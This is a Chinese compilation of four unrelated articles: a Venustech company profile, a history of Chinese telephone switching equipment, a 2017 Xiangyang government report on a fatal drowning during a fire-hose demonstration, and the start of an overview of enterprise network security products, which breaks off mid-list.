第一篇：信息安全領(lǐng)域企業(yè)

啟明星辰公司成立于1996年，由留美博士嚴(yán)望佳女士創(chuàng)建，是國(guó)內(nèi)最具實(shí)力的、擁有完全自主知識(shí)產(chǎn)權(quán)的網(wǎng)絡(luò)安全產(chǎn)品、可信安全管理平臺(tái)、安全服務(wù)與解決方案的綜合提供商。2010年6月23日，啟明星辰在深交所中小板正式掛牌上市。

啟明星辰擁有完善的專業(yè)安全產(chǎn)品線，橫跨防火墻/UTM、入侵檢測(cè)管理、網(wǎng)絡(luò)審計(jì)、終端管理、加密認(rèn)證等技術(shù)領(lǐng)域，共有百余個(gè)產(chǎn)品型號(hào)，并根據(jù)客戶需求不斷增加。啟明星辰解決方案為客戶的安全需求與信息安全產(chǎn)品、服務(wù)之間架起橋梁，將客戶的安全保障體系與信息安全核心技術(shù)緊密相連，幫助其建立完善的安全保障體系。目前，公司在全國(guó)各省市自治區(qū)設(shè)立三十多家分支機(jī)構(gòu)，擁有覆蓋全國(guó)的渠道和售后服務(wù)體系。

自2002年起，啟明星辰就持續(xù)保持國(guó)內(nèi)入侵檢測(cè)、漏洞掃描市場(chǎng)占有率第一。近年來(lái)，發(fā)展成為國(guó)內(nèi)統(tǒng)一威脅管理、安全管理平臺(tái)國(guó)內(nèi)市場(chǎng)第一位，安全性審計(jì)、安全專業(yè)服務(wù)市場(chǎng)領(lǐng)導(dǎo)者。

長(zhǎng)期以來(lái)，啟明星辰公司得到了黨和國(guó)家領(lǐng)導(dǎo)人的關(guān)懷與鼓勵(lì)。2000年1月，江澤民、李嵐清、曾慶紅等黨和國(guó)家領(lǐng)導(dǎo)人親切視察啟明星辰公司；2003年1月，胡錦濤總書記親切接見了啟明星辰公司CEO嚴(yán)望佳博士。

憑借多年來(lái)的潛心研發(fā)，啟明星辰成為國(guó)家認(rèn)定的企業(yè)級(jí)技術(shù)中心、國(guó)家規(guī)劃布局內(nèi)重點(diǎn)軟件企業(yè)，擁有最高級(jí)別的涉及國(guó)家秘密的計(jì)算機(jī)信息系統(tǒng)集成資質(zhì)，并獲得國(guó)家火炬計(jì)劃軟件產(chǎn)業(yè)優(yōu)秀企業(yè)，中國(guó)電子政務(wù)IT100強(qiáng)等榮譽(yù)。

位于北京中關(guān)村軟件園的啟明星辰大廈，目前是我國(guó)規(guī)模最大的國(guó)家級(jí)網(wǎng)絡(luò)安全研究基地。創(chuàng)造了百余項(xiàng)專利和軟件著作權(quán)，參與制訂國(guó)家及行業(yè)網(wǎng)絡(luò)安全標(biāo)準(zhǔn)，填補(bǔ)了我國(guó)信息安全科研領(lǐng)域的多項(xiàng)空白。完成包括國(guó)家發(fā)改委產(chǎn)業(yè)化示范工程，國(guó)家科技部863計(jì)劃、國(guó)家科技支撐計(jì)劃等國(guó)家級(jí)科研項(xiàng)目近百項(xiàng)。

作為信息安全行業(yè)的領(lǐng)軍企業(yè)，啟明星辰以用戶需求為根本動(dòng)力，研究開發(fā)了完善的專業(yè)安全產(chǎn)品線。通過(guò)不斷耕耘，已經(jīng)成為在政府、電信、金融、能源、交通、軍隊(duì)、軍工、制造等國(guó)內(nèi)高端企業(yè)級(jí)客戶的首選品牌：?jiǎn)⒚餍浅皆谡蛙婈?duì)擁有80%的市場(chǎng)占有率，為世界五百?gòu)?qiáng)中60%的中國(guó)企業(yè)客戶提供安全產(chǎn)品及服務(wù)；在金融領(lǐng)域，啟明星辰對(duì)政策性銀行、國(guó)有控股商業(yè)銀行、全國(guó)性股份制商業(yè)銀行實(shí)現(xiàn)90%的覆蓋率。在電信領(lǐng)域，啟明星辰為中國(guó)移動(dòng)、中國(guó)電信、中國(guó)聯(lián)通三大運(yùn)營(yíng)商提供安全產(chǎn)品、安全服務(wù)和解決方案。

作為北京奧組委獨(dú)家中標(biāo)的核心信息安全產(chǎn)品、服務(wù)及解決方案提供商，奧帆委唯一信息安全供應(yīng)商，啟明星辰受到獨(dú)家官方授權(quán),全面負(fù)責(zé)奧運(yùn)會(huì)主體網(wǎng)絡(luò)系統(tǒng)的安全保障，得到了國(guó)家主管部門的大力嘉獎(jiǎng)。此外，啟明星辰還為上海世博會(huì)、廣州亞運(yùn)會(huì)等多項(xiàng)世界級(jí)大型活動(dòng)提供全方位信息安全保障。

在公司快速穩(wěn)定發(fā)展的同時(shí)，啟明星辰公司堅(jiān)持以愛心回饋社會(huì)，截止目前，已累計(jì)資助貧困學(xué)子、受災(zāi)、貧困群眾近2000多萬(wàn)元人民幣，并在江西、青海、新疆等地援建了5所希望小學(xué)。

啟明星辰公司將秉承誠(chéng)信和創(chuàng)新精神，繼續(xù)致力于提供具有國(guó)際競(jìng)爭(zhēng)力的自主創(chuàng)新的安全產(chǎn)品和最佳實(shí)踐服務(wù)，幫助客戶全面提升其IT基礎(chǔ)設(shè)施的安全性和生產(chǎn)效能，為打造和提升國(guó)際化的民族信息安全產(chǎn)業(yè)第一品牌而不懈努力。

第二篇：發(fā)展歷程——信息領(lǐng)域

1997年6月23日，四川梁山彝族同胞們象過(guò)火把節(jié)一樣，歡天喜地地慶賀當(dāng)?shù)?000門程控電話正式開通。從這一天起，全國(guó)各大縣、市的老百姓們都用上了程控電話。我國(guó)的電話交換機(jī)總?cè)萘客黄埔粌|門，中國(guó)的電信網(wǎng)一舉成為世界第二大通信網(wǎng)。要發(fā)展電話通信，離不開電話交換機(jī)。它作為整個(gè)電話網(wǎng)的心臟，對(duì)各個(gè)用戶的互連、轉(zhuǎn)接起著關(guān)鍵作用。20年前我們的電話交換還是人工和機(jī)械的結(jié)合。交換效率低，通話容量小。對(duì)于那時(shí)的老百姓；打電話難，裝電話更難。而此時(shí)，國(guó)外則在嘗試著利用計(jì)算機(jī)控制電話交換，程控交換技術(shù)應(yīng)運(yùn)而生。通信技術(shù)的突飛猛進(jìn)已容不得我們按部就班地發(fā)展。中國(guó)的決策者們果斷決定；跳過(guò)交換技術(shù)發(fā)展的中間過(guò)程，直接向程控交換邁進(jìn)。讓中國(guó)的通信技術(shù)來(lái)一個(gè)跨越式的發(fā)展。對(duì)于習(xí)慣了傳統(tǒng)設(shè)計(jì)思路的科研人員來(lái)說(shuō)，要實(shí)現(xiàn)技術(shù)上的跨越，更需要的是一種大膽的創(chuàng)新精神。搞了大半輩子計(jì)算機(jī)設(shè)計(jì)的鄔將新，突發(fā)奇想；早先的程控機(jī)是由計(jì)算機(jī)部分控制電話交換。如果反過(guò)來(lái)想，完全可以把交換機(jī)看作一臺(tái)能自動(dòng)完成交換任務(wù)的計(jì)算機(jī)。沿著這樣的思路，鄔將新和他的同事們拿出了國(guó)內(nèi)第一臺(tái)萬(wàn)門程控交換機(jī)，04機(jī)。04機(jī)創(chuàng)新的設(shè)計(jì)思想和獨(dú)特的系統(tǒng)結(jié)構(gòu)，讓國(guó)內(nèi)外的廠商覺得不可思議。但它實(shí)用的功能卻讓人信服。和國(guó)外的交換機(jī)相比，04機(jī)不但性能穩(wěn)定，還有易操作的特點(diǎn)。中國(guó)的產(chǎn)品在市場(chǎng)上也有了一席之地。巨龍這種創(chuàng)新精神鼓舞了國(guó)內(nèi)廠商，使他們相信靠中國(guó)人的聰明才智，程控交換沒(méi)有什么秘密可言。就在巨龍成功不久，大唐、中興集團(tuán)也推出了自己的產(chǎn)品。不到兩個(gè)月，華為吸取各家技術(shù)生產(chǎn)出了08機(jī)。技術(shù)上的進(jìn)步反過(guò)來(lái)又大大增強(qiáng)了國(guó)內(nèi)企業(yè)的市場(chǎng)競(jìng)爭(zhēng)力。到1997年底國(guó)產(chǎn)交換機(jī)已經(jīng)占到市場(chǎng)份額的90％。正是這種大膽的創(chuàng)新讓中國(guó)的企業(yè)充滿生機(jī)，為我們帶來(lái)了技術(shù)和市場(chǎng)的共同突破。國(guó)人驕傲而自豪地宣稱；這是一次“巨大中華”帶來(lái)的“群體突破”。這種“群體突破”迅速擴(kuò)展到整個(gè)電信領(lǐng)域。當(dāng)移動(dòng)通信技術(shù)日益成熟的時(shí)候，大唐開始了移動(dòng)通信機(jī)站的開發(fā)，在當(dāng)年產(chǎn)品投放市場(chǎng)。隨后的半年內(nèi)巨龍、中興、華為也拿出了自己的產(chǎn)品。今天我們的通信設(shè)備已經(jīng)開始向國(guó)外大量出口。從當(dāng)年的引進(jìn)來(lái)到現(xiàn)在的走出去，中國(guó)正逐步融入國(guó)際競(jìng)爭(zhēng)的潮流當(dāng)中。

第三篇：重點(diǎn)領(lǐng)域信息公開

重點(diǎn)領(lǐng)域信息公開

2017年5月24日10時(shí)40分左右，新興重工湖北3611機(jī)械有限公司在襄陽(yáng)市魚梁州漢江北支航道南岸河堤上（小清河入江口對(duì)岸東段3km處）進(jìn)行消防遠(yuǎn)程供水系統(tǒng)裝備演示時(shí)。發(fā)生一起淹溺事故，造成一人死亡，直接經(jīng)濟(jì)損失109.36萬(wàn)。

根據(jù)《安全生產(chǎn)事故報(bào)告和調(diào)查處理?xiàng)l例》（國(guó)務(wù)院令第493號(hào)）和《湖北省生產(chǎn)安全事故報(bào)告和調(diào)查處理辦法》（省政府令第354號(hào)）等有關(guān)法律法規(guī)的規(guī)定，襄陽(yáng)市人民政府依法成立了由市安監(jiān)局、市監(jiān)察局、市公安局、市總工會(huì)等有關(guān)部門負(fù)責(zé)同志參加的新興重工湖北3611機(jī)械有限公司“5.24”淹溺事故調(diào)查組（以下簡(jiǎn)稱事故調(diào)查組），并邀請(qǐng)市人民檢察院派員參加事故調(diào)查工作。

事故調(diào)查組按照“四不放過(guò)”和“科學(xué)嚴(yán)謹(jǐn)，依法依規(guī)，實(shí)事求是，注重實(shí)效”的原則，通過(guò)現(xiàn)場(chǎng)勘察，調(diào)查取證，綜合分析，查明了事故發(fā)生的經(jīng)過(guò)、原因、應(yīng)急處理、人員傷亡和直接經(jīng)濟(jì)損失情況，認(rèn)定了事故性質(zhì)和責(zé)任，提出了對(duì)有關(guān)責(zé)任人和責(zé)任單位的處理建議和事故防范措施建議，現(xiàn)將有關(guān)情況報(bào)告如下：

一、基本情況

（一）事故單位情況

新興重工湖北3611機(jī)械有限公司（以下簡(jiǎn)稱3611公司）始建于1968年，原隸屬于總后軍需生產(chǎn)管理部，2008年有工廠制整體改為公司制，現(xiàn)隸屬于新興際華集團(tuán)有限公司，該公司位于襄陽(yáng)市人民西路168號(hào)，工商營(yíng)業(yè)執(zhí)照統(tǒng)一社會(huì)信用代碼為***55N，企業(yè)法定代表人鄧先義，公司注冊(cè)資本3億元，公司經(jīng)營(yíng)范圍：油料器材，應(yīng)急供排水裝備，汽車零部件鑄造和制造；礦產(chǎn)資源開發(fā)；貨物進(jìn)出口；汽車、工程機(jī)械，發(fā)動(dòng)機(jī)，五金工具，金屬材料，化工產(chǎn)品，消防車銷售；小型機(jī)械設(shè)備制造；消防器材生產(chǎn)與銷售。該公司擁有鋁鎂合金產(chǎn)品全流程工藝設(shè)計(jì)與模具制造能力，是新興際華集團(tuán)國(guó)家級(jí)應(yīng)急救援產(chǎn)業(yè)設(shè)在中部地區(qū)的研發(fā)生產(chǎn)基地，產(chǎn)品廣泛應(yīng)用于國(guó)防、公安、冶金、能源、化工、食品和環(huán)衛(wèi)等眾多領(lǐng)域，現(xiàn)有武漢、襄陽(yáng)兩個(gè)生產(chǎn)基地。

該公司是國(guó)家級(jí)高新技術(shù)企業(yè)，擁有省級(jí)企業(yè)技術(shù)中心，先后榮獲國(guó)家科技進(jìn)步二等獎(jiǎng)三項(xiàng)，軍隊(duì)科技進(jìn)步一等獎(jiǎng)一項(xiàng)、二等獎(jiǎng)一項(xiàng)、三等獎(jiǎng)一項(xiàng)，全軍后勤重大科技獎(jiǎng)二項(xiàng)，湖北省科技進(jìn)步獎(jiǎng)一項(xiàng)。先后通過(guò)了ISO14001環(huán)境管理體系認(rèn)證、ISO9001和TS16949質(zhì)量管理體系認(rèn)證、ISO18001職業(yè)健康安全管理體系認(rèn)證，公司副總經(jīng)理姚啟義取得安全生產(chǎn)主要負(fù)責(zé)人資格證書，設(shè)備動(dòng)力部部長(zhǎng)度海濤，安全員常華森分別取得安全管理人員資格證書。2016年2月23日，山東省濟(jì)南市公安消防支隊(duì)與3611公司簽訂了一份采購(gòu)1套6KM遠(yuǎn)程供水系統(tǒng)裝備合同，合同總金額1830萬(wàn)元，約定合同生效后360天內(nèi)交貨。

（二）遠(yuǎn)程供水系統(tǒng)演示場(chǎng)地選擇情況

3611公司根據(jù)采購(gòu)合同約定在遠(yuǎn)程供水系統(tǒng)裝備交貨時(shí)，客戶先到廠家驗(yàn)收合格后再到客戶指定地點(diǎn)演示驗(yàn)收，3611公司向濟(jì)南市公安消防支隊(duì)交貨的是6KM遠(yuǎn)程供水系統(tǒng)裝備，濟(jì)南市公安消防支隊(duì)驗(yàn)收人員要求在實(shí)地展開3KM供水線路，全面測(cè)試一下系統(tǒng)性能，由于3KM遠(yuǎn)程供水系統(tǒng)演示在廠區(qū)內(nèi)無(wú)法展開，所以，3611公司將演示地點(diǎn)選擇在魚梁州漢江北支航道南岸河堤上（小清河入江口東段3KM處）。該段河堤堤高3.46米，堤頂路面寬6.33米，河堤坡比1:3，堤頂路面較窄，為沙石路面，常有車輛通行，堤邊無(wú)護(hù)欄和樹木。

（三）6KM遠(yuǎn)程供水系統(tǒng)裝備組成情況

3611公司生產(chǎn)的6KM遠(yuǎn)程供水系統(tǒng)主要由2臺(tái)泵浦消防車和3臺(tái)水帶敷設(shè)消防車組成。泵浦消防車是遠(yuǎn)程供水系統(tǒng)的重要組成部分，主要用于系統(tǒng)的吸水及管路加壓，實(shí)現(xiàn)長(zhǎng)距離輸送。泵浦消防車主要有消防車底盤、上裝大箱、KTA38-P1200加壓發(fā)動(dòng)機(jī)總成、DFSS350-614A加壓泵、液壓系統(tǒng)、液壓軟管卷盤總成、浮艇泵總成、托盤總成、隨車吊總成、控制系統(tǒng)、隨車器材等組成。其主要性能指標(biāo)：管線通徑Φ300mm,加壓泵出口壓力小于1.0MPa，出口流量大于26400L/min，系統(tǒng)供水流量單干線大于13200L/min，雙干線大于26400L/min，供水距離大于或等于4000米。水帶敷設(shè)消防車是遠(yuǎn)程供水系統(tǒng)的重要組成部分，主要用于遠(yuǎn)程供水系統(tǒng)水帶的自動(dòng)收發(fā)，實(shí)現(xiàn)長(zhǎng)距離輸送。水帶敷設(shè)消防車主要由底盤、水帶收卷機(jī)頭、水帶箱、清洗裝置、水帶等組成。其主要性能指標(biāo)：水帶通徑Φ300mm，水帶長(zhǎng)度2000米，鋪設(shè)速度小于45km/h,撤收速度小于2.5km/h。

本次遠(yuǎn)程供水系統(tǒng)實(shí)地演示作業(yè)是按照濟(jì)南市公安消防支隊(duì)要求，在實(shí)地展開3KM供水線路并吸水、出水，其演示系統(tǒng)組成由2臺(tái)泵浦消防車和2臺(tái)水帶敷設(shè)消防車組成。

二、事故發(fā)生經(jīng)過(guò)及救援情況

2017年5月24日6時(shí)45分，根據(jù)3611公司5月23日下午召開的遠(yuǎn)程供水系統(tǒng)實(shí)地演示工作會(huì)議安排，特種裝備事業(yè)部班長(zhǎng)陳松帶領(lǐng)車間13名工人（姜華、譚志剛、薛正東、郭保華、付修斌、萬(wàn)少軍、陳俊、潘耀波、徐飛、陳俊濤、朱非、郭明、詹運(yùn)軍）及濟(jì)南市公安消防支隊(duì)3名官兵，駕駛遠(yuǎn)程供水系統(tǒng)中的2臺(tái)泵浦消防車和2臺(tái)水帶敷設(shè)消防車，由濟(jì)南市公安消防支隊(duì)小車開道，從公司出發(fā)，途徑松鶴路，長(zhǎng)虹路，人民路，丹江路，魚梁州大橋，明珠路到達(dá)漢江北支航道南岸河堤（小清河入江口東段3KM處），7時(shí)40分左右車隊(duì)到達(dá)演示地點(diǎn)。根據(jù)事先工作分工，參演人員開始對(duì)3KM遠(yuǎn)程供水系統(tǒng)進(jìn)行展開作業(yè)。泵浦消防車的展開作業(yè)由姜華負(fù)責(zé)操作，另有2名工人和1名消防戰(zhàn)士協(xié)助，他們先將浮艇泵放到河邊后與吸水管連接，再將浮艇泵送入漢江水中，然后再到堤面將水帶敷設(shè)車預(yù)留的水帶連接到泵浦消防車的出水口。第一臺(tái)水帶浦設(shè)消防車由濟(jì)南市公安消防支隊(duì)1名戰(zhàn)士操作，另有3名工人協(xié)助，從泵浦消防車處沿河堤堤頂路面向東敷設(shè)了2000米供水水帶。第二臺(tái)水帶敷設(shè)消防車由譚志剛負(fù)責(zé)操作，另有3名工人協(xié)助，在連接第一臺(tái)水帶敷設(shè)消防車留下的水帶接口后繼續(xù)向前敷設(shè)了1000米供水水帶，為了不影響堤頂路面車輛正常通行，水帶敷設(shè)消防車在沿堤頂路面敷設(shè)水帶時(shí)，隨車的線路調(diào)整人員將水帶移至路邊1米左右，在線路末端出水口，由工人薛正東、萬(wàn)少軍和陳俊3人接上了流量計(jì)，在流量計(jì)另一接口連接一段20米，直徑300mm的水帶，在20米水帶末端接入一個(gè)三通分水器，分成3個(gè)直徑150mm的出水口，在3個(gè)出水口又分別連接20米（直徑150mm）的水帶，在3條水帶末端又分別接入三個(gè)四通分水器，變成12個(gè)直徑80mm的出水口。遠(yuǎn)程供水系統(tǒng)展開完畢后，班長(zhǎng)陳松帶領(lǐng)萬(wàn)少軍等5名工人對(duì)3000米供水線路的水帶連接點(diǎn)進(jìn)行了檢查（供水水帶每100米有一個(gè)連接頭），檢查完成后在末端出水口待命，9時(shí)40分左右，公司副總姚啟義、譚成頂，特種設(shè)備部部長(zhǎng)王浩，生產(chǎn)管理部部長(zhǎng)趙朝剛等人分別到達(dá)演示現(xiàn)場(chǎng)（泵浦消防車取水口處），王浩向姜華詢問(wèn)泵浦消防車的展開情況，姜華說(shuō)“全部準(zhǔn)備到位”，大約9時(shí)50分左右他們就從取水口處乘車向出水口處巡查，10時(shí)左右到達(dá)出水口，王浩向陳松詢問(wèn)：“準(zhǔn)備好了嗎”，陳松說(shuō)：“準(zhǔn)備好了”，王浩說(shuō)：“通知姜華開始演示”，陳松立即用電話通知姜華開始演示，姜華接到通知后先啟動(dòng)浮艇泵吸水，然后再啟動(dòng)加壓泵，20分鐘后出水口開始出水，大約出水10分鐘左右，陳松發(fā)現(xiàn)流量計(jì)沒(méi)有顯示，就電話通知詹運(yùn)軍過(guò)來(lái)進(jìn)行維修，考慮到距離較遠(yuǎn)，陳松就讓薛正東開自己的私車去接他，詹運(yùn)軍在吸水口處接到電話后就沿河堤向出水口方向走，走到1.5km處遇到薛正東，薛正東告訴他先去取水口送工具，返回時(shí)接他一起走，薛正東到達(dá)吸水口放下工具后就往回走，在1km處發(fā)現(xiàn)有一段供水水帶從堤上落入水中（大約1km左右）,繼續(xù)往前走，沿途沒(méi)發(fā)現(xiàn)詹運(yùn)軍。車到達(dá)出水口后，薛正東向王浩、陳松報(bào)告返回的路上沒(méi)有看到詹運(yùn)軍，看見有一段水帶滑落水中。10時(shí)50分左右一名在江邊釣魚的群眾路過(guò)吸水口處對(duì)姜華等人說(shuō)：“你們的水帶把一個(gè)釣魚的人卷入水中了，隨后一臺(tái)面包車也開過(guò)來(lái)，司機(jī)對(duì)他們說(shuō):“你們的水帶把人卷到水里了”?，F(xiàn)場(chǎng)工人潘耀波立即給出水口處的王浩打電話報(bào)告事故情況，隨后兩邊的參試人員分別趕往出事地點(diǎn)，姚啟義指揮達(dá)到現(xiàn)場(chǎng)人員趕緊下水救人，他們抬起水帶，發(fā)現(xiàn)落水者頭朝下，背朝上，頭和腿都在水中，衣服纏繞在300mm的水帶上，無(wú)法將人從水帶上分開，趙朝剛從附近釣魚群眾那里借來(lái)一把小剪刀，將落水者的衣服剪開后將人抬到河堤邊，此時(shí)救援人員發(fā)現(xiàn)落水者是本廠工人詹運(yùn)軍，他們先將其頭朝下控水，然后陳松、武概對(duì)其進(jìn)行胸壓，王浩對(duì)其進(jìn)行了人工呼吸，同時(shí)姚啟義又安排其他工人對(duì)江邊水帶落水的地帶進(jìn)行巡查，查找是否有其他人員落水。隨后水上公安派出所和“120”救護(hù)車趕到，醫(yī)護(hù)人員對(duì)詹運(yùn)軍進(jìn)行現(xiàn)場(chǎng)急救無(wú)效，經(jīng)對(duì)其生命體征檢查確認(rèn)死亡。

2017年5月29日，3611公司與死者家屬達(dá)成死亡賠償協(xié)議，事故善后工作得到妥善處理。

三、事故原因和性質(zhì)

（一）直接原因

經(jīng)調(diào)查認(rèn)定，該起事故的直接原因是在遠(yuǎn)程供水系統(tǒng)演示中，供水線路水帶加壓充水后發(fā)生移位，導(dǎo)致水袋從堤邊滑落將正在堤邊行走的作業(yè)人員帶入水中，造成溺水身亡。

（二）間接原因

1、未編制室外演示作業(yè)方案，3611公司在組織3KM遠(yuǎn)程供水系統(tǒng)室外實(shí)地演示作業(yè)前，沒(méi)有編制演示作業(yè)方案（室外試驗(yàn)大綱），各小組都在憑經(jīng)驗(yàn)操作，對(duì)演示作業(yè)中的各個(gè)環(huán)節(jié)存在的安全風(fēng)險(xiǎn)沒(méi)有辨識(shí)，沒(méi)有提出有針對(duì)性的安全防范措施。

2、演示場(chǎng)地選擇不當(dāng)，水帶敷設(shè)不合安全要求。魚梁州漢江北支航道南岸河堤（小清河入江口對(duì)岸河堤?hào)|段）堤高3.46米，堤頂路面寬6.33米，岸堤坡比1:3，堤頂路面較窄，常有車輛通行，堤邊無(wú)護(hù)欄和樹木，江邊有群眾釣魚，堤頂路邊放有摩托車、電動(dòng)車，為了不影響堤頂路面車輛的正常通行，水帶敷設(shè)消防車在沿堤頂路面敷設(shè)水帶時(shí)，線路調(diào)整人員將水帶移至堤頂路邊1米左右，在水帶加壓充水后延伸移位時(shí)，極易造成水帶沿堤邊滑落。

3、演示現(xiàn)場(chǎng)安全防護(hù)措施不到位，演示作業(yè)人員在沿堤頂路面邊緣1米左右敷設(shè)水帶時(shí)，沒(méi)有采取防止水帶移位從堤邊滑落的安全措施。

4、演示作業(yè)人員安全意識(shí)不高。電工詹運(yùn)軍在從取水口（泵浦消防車）到出水口檢修流量計(jì)時(shí)，沿途從河堤堤頂路面外側(cè)邊緣（水帶與堤邊之間）行走，導(dǎo)致在水帶移位滑落時(shí)將其帶入水中。

（三）事故性質(zhì)

經(jīng)調(diào)查認(rèn)定：3611公司遠(yuǎn)程供水系統(tǒng)演示“5.24”淹溺事故是一起生產(chǎn)安全責(zé)任事故。

四、對(duì)事故責(zé)任人和責(zé)任單位的處理建議

1、鄧先義，男，中共黨員，3611公司法定代表人，總經(jīng)理。履行安全生產(chǎn)管理職責(zé)不到位，對(duì)事故發(fā)生負(fù)有領(lǐng)導(dǎo)責(zé)任，建議由市安監(jiān)部門對(duì)其給予上一年年收入30%的罰款。

2、李連望，男，中共黨員，3611公司副總經(jīng)理，分管安全生產(chǎn)工作。履行安全生產(chǎn)管理職責(zé)不到位，對(duì)3611公司安全生產(chǎn)監(jiān)督指導(dǎo)不力，對(duì)事故發(fā)生負(fù)有主要領(lǐng)導(dǎo)責(zé)任，建議由新興際華集團(tuán)有限公司按有關(guān)規(guī)定給予責(zé)任追究和經(jīng)濟(jì)處罰。

3、趙朝剛，男，中共黨員，3611公司生產(chǎn)管理部部長(zhǎng)，負(fù)責(zé)生產(chǎn)經(jīng)營(yíng)和安全管理。負(fù)責(zé)組織遠(yuǎn)程供水系統(tǒng)演示作業(yè)，對(duì)遠(yuǎn)程供水系統(tǒng)室外演示作業(yè)未編制方案，演示場(chǎng)地選擇不當(dāng)，水帶敷設(shè)不符合安全要求，現(xiàn)場(chǎng)安全防護(hù)措施不到位等安全問(wèn)題失察，對(duì)事故發(fā)生負(fù)主要領(lǐng)導(dǎo)責(zé)任，建議由3611公司按有關(guān)管理規(guī)定給予責(zé)任追究，并給予經(jīng)濟(jì)處罰。

4、王浩，男，中共黨員，3611公司特裝事業(yè)部部長(zhǎng)。負(fù)責(zé)組織遠(yuǎn)程供水系統(tǒng)演示作業(yè)，對(duì)遠(yuǎn)程供水系統(tǒng)室外演示作業(yè)未編制方案，演示場(chǎng)地選擇不當(dāng)，水帶敷設(shè)不符合安全要求，現(xiàn)場(chǎng)防護(hù)措施不到位等安全問(wèn)題失察，對(duì)事故發(fā)生負(fù)有主要領(lǐng)導(dǎo)責(zé)任，建議由3611公司按有關(guān)管理規(guī)定給予責(zé)任追究，并給予經(jīng)濟(jì)處罰。

5、度海濤，男，中共黨員，3611公司設(shè)備動(dòng)力部部長(zhǎng)，負(fù)責(zé)公司安全生產(chǎn)管理。履行安全生產(chǎn)管理職責(zé)不到位，對(duì)遠(yuǎn)程供水系統(tǒng)室外演示作業(yè)督促指導(dǎo)不力，對(duì)事故發(fā)生負(fù)有領(lǐng)導(dǎo)責(zé)任，建議3611公司按有關(guān)管理規(guī)定，給予責(zé)任追究，并給予經(jīng)濟(jì)處罰。

6、3611公司對(duì)遠(yuǎn)程供水系統(tǒng)室外演示作業(yè)未編制方案，演示場(chǎng)地選擇不當(dāng)，水帶敷設(shè)不符合安全要求，現(xiàn)場(chǎng)安全防護(hù)措施不到位，作業(yè)人員安全意識(shí)不高，未切實(shí)落實(shí)企業(yè)安全生產(chǎn)主體責(zé)任，對(duì)事故發(fā)生負(fù)有責(zé)任，建議由市安監(jiān)局依法對(duì)該公司給予行政罰款的處罰。

五、事故防范及整改措施建議1、3611公司要認(rèn)真吸取事故教訓(xùn)，切實(shí)履行企業(yè)安全生產(chǎn)主體責(zé)任，加大對(duì)從業(yè)人員的安全教育和技能培訓(xùn)，提高從業(yè)人員素質(zhì)。

2、3611公司要加強(qiáng)特種裝備室外演示作業(yè)現(xiàn)場(chǎng)的安全管理，完善安全作業(yè)規(guī)程（室外實(shí)驗(yàn)大綱）落實(shí)安全技術(shù)措施，加強(qiáng)作業(yè)現(xiàn)場(chǎng)管理，嚴(yán)格查處違章指揮，違規(guī)作業(yè)，違反勞動(dòng)紀(jì)律的行為。

3、3611公司要加大隱患排查力度，提高安全風(fēng)險(xiǎn)（隱患）識(shí)別能力，增強(qiáng)員工安全防范意識(shí)，預(yù)防類似事故的再次發(fā)生。

附件：

1、新興重工湖北3611機(jī)械有限公司

“5.24”淹溺事故死亡人員名單

2、新興重工湖北3611機(jī)械有限公司

“5.24”淹溺事故直接經(jīng)濟(jì)損失。

3、新興重工湖北3611機(jī)械有限公司

“5.24”淹溺事故調(diào)查組成員簽名

4、事故現(xiàn)場(chǎng)照片襄陽(yáng)市人民政府新興重工湖北3611機(jī)械有限公司“5.24”淹溺事故調(diào)查組

2017年6月23日

第四篇：企業(yè)網(wǎng)絡(luò)信息安全解決方案

企業(yè)網(wǎng)絡(luò)信息安全解決方案

一、信息安全化定義

企業(yè)信息安全管理即針對(duì)當(dāng)前企業(yè)面臨的病毒泛濫、黑客入侵、惡意軟件、信息失控等復(fù)雜的應(yīng)用環(huán)境制定相應(yīng)的防御措施，保護(hù)企業(yè)信息和企業(yè)信息系統(tǒng)不被未經(jīng)授權(quán)的訪問(wèn)、使用、泄露、中斷、修改和破壞，為企業(yè)信息和企業(yè)信息系統(tǒng)提供保密性、完整性、真實(shí)性、可用性、不可否認(rèn)性服務(wù)。簡(jiǎn)而言之，使非法者看不了、改不了信息，系統(tǒng)癱不了、信息假不了、行為賴不了。

二、企業(yè)信息安全管理現(xiàn)狀

當(dāng)前企業(yè)在信息安全管理中普遍面臨的問(wèn)題：

(1)缺乏來(lái)自法律規(guī)范的推動(dòng)力和約束；

(2)安全管理缺乏系統(tǒng)管理的思想。被動(dòng)應(yīng)付多于主動(dòng)防御，沒(méi)有做前期的預(yù)防，而是出現(xiàn)問(wèn)題才去想補(bǔ)救的辦法，不是建立在風(fēng)險(xiǎn)評(píng)估基礎(chǔ)上的動(dòng)態(tài)的持續(xù)改進(jìn)的管理方法；

(3)重視安全技術(shù)，忽視安全管理。企業(yè)愿意在防火墻等安全技術(shù)上投資，而相應(yīng)的管理水平、手段沒(méi)有體現(xiàn)，包括管理的技術(shù)和流程，以及員工的管理；

(4)在安全管理中不夠重視人的因素；(5)缺乏懂得管理的信息安全技術(shù)人員；

(6)企業(yè)安全意識(shí)不強(qiáng)，員工接受的教育和培訓(xùn)不夠。

三、企業(yè)信息安全管理產(chǎn)品

建立完善的企業(yè)信息安全管理系統(tǒng)，必須內(nèi)外兼修，一方面要防止外部入侵，另一方面也要防范內(nèi)部人員泄密可能。所以在選擇企業(yè)信息安全管理產(chǎn)品時(shí)，必須是一個(gè)完整的體系結(jié)構(gòu)。目前，在市場(chǎng)上比較流行，而又能夠代表未來(lái)發(fā)展方向的安全產(chǎn)品大致有以下幾類：用戶身份認(rèn)證，如靜態(tài)密碼、動(dòng)態(tài)密碼（短信密碼、動(dòng)態(tài)口令牌、手機(jī)令牌）、USB KEY、IC卡、數(shù)字證書、指紋虹膜等。

防火墻

即訪問(wèn)控制系統(tǒng)，它在內(nèi)部網(wǎng)絡(luò)與不安全的外部網(wǎng)絡(luò)之間設(shè)置障礙，阻止外界對(duì)內(nèi)部資源的非法訪問(wèn)，防止內(nèi)部對(duì)外部的不安全訪問(wèn)。但它其本身可能存在安全問(wèn)題，也可能會(huì)是一個(gè)潛在的瓶頸。

安全路由器

由于WAN連接需要專用的路由器設(shè)備，因而可通過(guò)路由器來(lái)控制網(wǎng)絡(luò)傳輸。通常采用訪問(wèn)控制列表技術(shù)來(lái)控制網(wǎng)絡(luò)信息流。

安全服務(wù)器

安全服務(wù)器主要針對(duì)一個(gè)局域網(wǎng)內(nèi)部信息存儲(chǔ)、傳輸?shù)陌踩Ｃ軉?wèn)題，其實(shí)現(xiàn)功能包括對(duì)局域網(wǎng)資源的管理和控制，對(duì)局域網(wǎng)內(nèi)用戶的管理，以及局域網(wǎng)中所有安全相關(guān)事件的審計(jì)和跟蹤。

安全管理中心

